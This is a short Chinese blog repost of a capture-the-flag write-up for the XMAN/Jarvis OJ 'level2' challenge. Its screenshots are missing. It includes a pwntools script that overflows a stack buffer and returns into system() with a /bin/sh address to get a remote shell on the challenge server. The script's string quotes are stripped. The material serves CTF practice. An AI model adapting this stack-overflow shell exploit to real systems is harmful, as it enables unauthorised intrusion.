首页 > 其他 > 详细

[XMAN]level2

时间:2018-07-29 17:34:29      阅读:199      评论:0      收藏:0      [点我收藏+]

 

技术分享图片

老套路

checksec

技术分享图片

ida查看

技术分享图片

技术分享图片

覆盖掉

之后system地址再返回覆盖 最后/bin/sh地址

# -*- coding:utf-8 -*-

from pwn import *


sh = remote(pwn2.jarvisoj.com, 9878)  # remote


junk = a * 0x88 

fakebp = a*4

sh_address = 0x0804A024  # /bin/sh

sys_address = 0x08048320


payload = junk + fakebp + p32(sys_address)+aaaa+p32(sh_address)

sh.send(payload)

sh.interactive()

 

[XMAN]level2

原文:https://www.cnblogs.com/alyx/p/9385922.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!